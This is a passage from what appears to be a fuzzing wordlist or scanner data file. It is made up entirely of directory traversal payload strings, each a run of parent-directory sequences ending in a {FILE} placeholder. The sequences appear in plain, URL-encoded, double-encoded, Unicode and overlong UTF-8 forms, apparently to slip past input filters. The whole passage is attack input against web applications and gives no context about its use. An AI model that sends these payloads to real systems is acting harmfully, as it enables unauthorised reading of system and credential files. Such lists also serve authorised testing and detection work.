"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,..0x2f{FILE}",
"true,..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
"true,0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
"true,0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
"true,..0x5c{FILE}",
"true,..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
"true,0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
